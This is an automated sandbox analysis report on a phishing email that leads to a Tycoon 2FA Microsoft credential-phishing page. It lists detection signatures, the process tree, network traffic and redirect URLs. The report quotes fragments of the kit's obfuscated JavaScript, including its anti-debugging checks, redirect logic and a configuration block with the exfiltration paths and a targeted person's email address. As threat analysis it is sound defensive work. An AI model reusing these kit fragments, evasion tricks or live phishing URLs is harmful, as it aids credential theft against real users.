Edit tour

Windows Analysis Report
original.eml

Overview

General Information

Sample name:	original.eml
Analysis ID:	1664865
MD5:	7f38f70eab3e0c5a1aef096522898b69
SHA1:	ce17b94ae13e6edce0853008b568e5500532f22a
SHA256:	773b881929cbd09c0c4205a25066eba0c12638ace367d99555de73b8c528e4cc
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Yara detected AntiDebug via timestamp check

Yara detected HtmlPhish10

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

AI detected suspicious elements in Email content

Detected suspicious crossdomain redirect

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML title does not match URL

Queries the volume information (name, serial number etc) of a device

Sigma detected: Outlook Security Settings Updated - Registry

Stores large binary data to the registry

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 7156 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8EF962C8-587C-46FC-AA6E-10CECDA9C7DC" "19D2DA89-BA59-47E8-8067-D2AC961BEE48" "7032" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

OUTLOOK.EXE (PID: 6568 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\0R1QN2RE\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)

Acrobat.exe (PID: 6884 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\0R1QN2RE\kkmjy.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 5292 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 6756 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2272 --field-trial-handle=1572,i,13672561319974863390,1630305343653636491,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

Acrobat.exe (PID: 7728 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\0R1QN2RE\kkmjy (003).pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

chrome.exe (PID: 7928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://can01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fm.exactag.com%2Fai.aspx%3F4jn%3Dd9959719bc4xtimr0b07205bbd26a23a8d2e6b6b4f9%26url%3Dhttp%25253Atowsila.com%2Fdayo%2Fxfhfco%2Fn8dpyz%2FbWljaGVsLm5vbGV0QG1ldGFsdXMucWMuY2E%3D&data=05%7C02%7Cmichel.nolet%40metalus.qc.ca%7C652b6460a9994141470e08dd7b81d498%7C4f85cc14eaa84e0b829193aab6969f78%7C0%7C0%7C638802520403002104%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C40000%7C%7C%7C&sdata=C0uBv%2BENiBtk5NKRimmz4WK3XdUyl6wgZSuhY3IfLL0%3D&reserved=0 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,14774494444067262456,14496842274030705599,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_192	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security

HTML

Source	Rule	Description	Author
1.9.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.11..script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.11..script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.5..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.0.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.16.d.script.csv	JoeSecurity_Tycoon2FA	Yara detected Tycoon 2FA PaaS	Joe Security
1.1.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
2.12..script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.12..script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.1.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.0.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.2.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.2.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
2.19..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
2.4.pages.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.4.pages.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
2.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
2.5.pages.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
2.5.pages.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
2.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
Click to see the 18 entries

Sigma Signatures

Sigma detected: Outlook Security Settings Updated - Registry

Source: Registry Key set

Author: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\0R1QN2RE\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'ul4.rxguzqe.es' does not match the legitimate domain for Microsoft., The domain 'rxguzqe.es' appears unrelated to Microsoft and uses a '.es' extension, which is not typical for Microsoft's global services., The subdomain 'ul4' and the main domain 'rxguzqe' do not have any recognizable association with Microsoft., The presence of a password input field on an unrecognized domain is suspicious and indicative of phishing. DOM: 2.5.pages.csv
Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'ul4.rxguzqe.es' does not match the legitimate domain for Microsoft., The domain 'rxguzqe.es' is unusual and does not relate to Microsoft, which raises suspicion., The URL contains no recognizable elements related to Microsoft, suggesting it may be a phishing attempt., The email domain 'metauls.qc.ca' is unrelated to Microsoft, which could indicate a phishing attempt. DOM: 2.4.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML

Yara detected Invisible JS

Source: Yara match	File source: 1.1.d.script.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 1.5..script.csv, type: HTML
Source: Yara match	File source: 1.1.d.script.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 2.19..script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_192, type: DROPPED

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 2.16.d.script.csv, type: HTML
Source: Yara match	File source: 1.9.d.script.csv, type: HTML
Source: Yara match	File source: 2.11..script.csv, type: HTML
Source: Yara match	File source: 1.4.d.script.csv, type: HTML
Source: Yara match	File source: 1.0.d.script.csv, type: HTML
Source: Yara match	File source: 2.12..script.csv, type: HTML
Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 1.2..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://ul4.rxguzqe.es/3VNrMehQ/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to execute a malicious payload, likely for the purpose of phishing or other malicious activities. The combination of these factors indicates a high-risk scenario that requires immediate attention and investigation.
Source: 2.12..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhz... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious redirection. The use of obfuscated code, aggressive DOM manipulation, and the presence of anti-debugging techniques further increase the risk. While some contextual factors like the use of a known domain (Flipkart) may suggest a legitimate purpose, the overall behavior of the script is highly suspicious and indicative of malicious intent.
Source: 1.8..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://ul4.rxguzqe.es/3VNrMehQ/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger-related function call further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
Source: 2.11..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhz... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects the user to a blank page, and intercepts various keyboard and mouse events to prevent common debugging and security actions. Additionally, it includes a setInterval loop that triggers a redirect to an external website after a short delay, which is highly suspicious. Overall, this script exhibits clear malicious intent and poses a significant security risk.
Source: 1.5..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://ul4.rxguzqe.es/3VNrMehQ/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The presence of obfuscated code and the potential for data exfiltration make this script highly suspicious and potentially malicious.

AI detected suspicious elements in Email content

Source: original.eml

Joe Sandbox AI: Detected potential phishing email: The email contains a suspicious URL that redirects through exactag.com to a potentially malicious domain (towsila.com). The sender email domain (tripcorp.tur.br) doesn't match the signature domain (ericsson.com). The email contains multiple duplicated signature blocks, suggesting content manipulation

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ

HTTP Parser: Number of links: 0

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://ul4.rxguzqe.es/3VNrMehQ/#Mmichel.nolet@metalus.qc.ca

HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function uXOoqOxHbl(event) { co...

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ

HTTP Parser: Title: Secure Profile Access System does not match URL

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "5n3pe";var emailcheck = "michel.nolet@metalus.qc.ca";var webname = "rtrim(/web9/, '/')";var urlo = "/tfinfwrpeordfzjurv60x8ppa5z43tf7avqk2qnq5mt4tfxnc6crjey8chemq8gz";var gdf = "/ijvb41unn0x78ys6wxu0jqcjmocab116";var odf = "/ghbjw0hf7ehkuj5au12d9raa4h0x3dyzxwjgpwl1tm06rab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "https://login.microsoftonline.com/common/sas/processauth";var useragent = navigator.useragent;var browsername;var userip;...
Source: https://ul4.rxguzqe.es/3VNrMehQ/	HTTP Parser: function joggsgtujc(){window.location.replace('https://google.com');var xhigmuclpk = document.currentscript;xhigmuclpk.parentnode.removechild(xhigmuclpk);}var gxxyibrrzs = "d";var punklhrqly = "x";var xblvnrxcpo = window.location.hash.substr(1);if (xblvnrxcpo) {xblvnrxcpo = xblvnrxcpo.split('#').pop();}if (!xblvnrxcpo) { const urlparams = new urlsearchparams(window.location.search); if (window.location.href.includes('%23')) { xblvnrxcpo = window.location.href.split('%23').pop(); } if (window.location.href.includes('?')) { xblvnrxcpo = window.location.href.split('?').pop(); gxxyibrrzs = ""; punklhrqly = ""; } if (window.location.href.includes('')) { xblvnrxcpo = window.location.href.split('').pop().replace(/%7b/g, '').replace(/%7d/g, ''); if (fjdbzvjnrx(xblvnrxcpo)) { gxxyibrrzs = "wq"; punklhrqly = ""; xblvnrxcpo = xblvnrxcpo; } else { gxxyibrrzs = ""; punklhrqly = ""; ...

Source: Email

Classification: Credential Stealer

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ

HTTP Parser: <input type="password" .../> found

Source: https://ul4.rxguzqe.es/3VNrMehQ/#Mmichel.nolet@metalus.qc.ca	HTTP Parser: No favicon
Source: https://ul4.rxguzqe.es/3VNrMehQ/#Mmichel.nolet@metalus.qc.ca	HTTP Parser: No favicon
Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No favicon
Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No favicon

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No <meta name="author".. found
Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No <meta name="author".. found

Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No <meta name="copyright".. found
Source: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.14.248.71:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.23.62.204:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.23.62.204:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.99:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.7.130:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.99:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49809 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: can01.safelinks.protection.outlook.com to https://m.exactag.com/ai.aspx?4jn=d9959719bc4xtimr0b07205bbd26a23a8d2e6b6b4f9&url=http%253atowsila.com/dayo/xfhfco/n8dpyz/bwljagvslm5vbgv0qg1ldgfsdxmucwmuy2e=

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?url=https%3A%2F%2Fm.exactag.com%2Fai.aspx%3F4jn%3Dd9959719bc4xtimr0b07205bbd26a23a8d2e6b6b4f9%26url%3Dhttp%25253Atowsila.com%2Fdayo%2Fxfhfco%2Fn8dpyz%2FbWljaGVsLm5vbGV0QG1ldGFsdXMucWMuY2E%3D&data=05%7C02%7Cmichel.nolet%40metalus.qc.ca%7C652b6460a9994141470e08dd7b81d498%7C4f85cc14eaa84e0b829193aab6969f78%7C0%7C0%7C638802520403002104%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C40000%7C%7C%7C&sdata=C0uBv%2BENiBtk5NKRimmz4WK3XdUyl6wgZSuhY3IfLL0%3D&reserved=0 HTTP/1.1Host: can01.safelinks.protection.outlook.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ai.aspx?4jn=d9959719bc4xtimr0b07205bbd26a23a8d2e6b6b4f9&url=http%253Atowsila.com/dayo/xfhfco/n8dpyz/bWljaGVsLm5vbGV0QG1ldGFsdXMucWMuY2E= HTTP/1.1Host: m.exactag.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dayo/xfhfco/n8dpyz/bWljaGVsLm5vbGV0QG1ldGFsdXMucWMuY2E= HTTP/1.1Host: towsila.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: towsila.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://towsila.com/dayo/xfhfco/n8dpyz/bWljaGVsLm5vbGV0QG1ldGFsdXMucWMuY2E=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
